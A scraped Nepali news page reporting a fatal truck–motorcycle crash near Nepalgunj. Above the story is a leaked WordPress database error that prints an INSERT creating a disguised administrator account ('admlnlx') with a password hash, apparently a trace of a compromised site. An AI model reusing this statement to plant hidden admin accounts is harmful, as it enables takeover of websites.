WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bq90Ls9.BzvJ9/GQnu3c7eVXhUSfvb.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:08:38', '', 'admlnlx', 'admlnlx')
नेपालगन्ज,मंसिर २३ –
बाँके जिल्लाको नेपालगन्ज–कोहलपुर सडकखण्डमा आज बिहान भएको दुर्घटनामा एकजनाको मृत्यु भएको छ ।
जिल्ला प्रहरी कार्यालयका अनुसार, नेपालगन्जतर्पm आउँदै गरेको ना४ख २४६८ नंको ट्रकले भे१प नंको मोटरसाइकललाई ठक्कर दिँदा त्यसमा सवार कोहलपुर निवासी मुबारक शाहीको मृत्यु भएको छ ।
दुर्घटनामा गम्भीर घाइते मोटरसाइकलका अर्का यात्रु रहिसरजा खानलाई उपचारका लागि भारतको लखनउ लगिएको जनाइएको छ । -रासस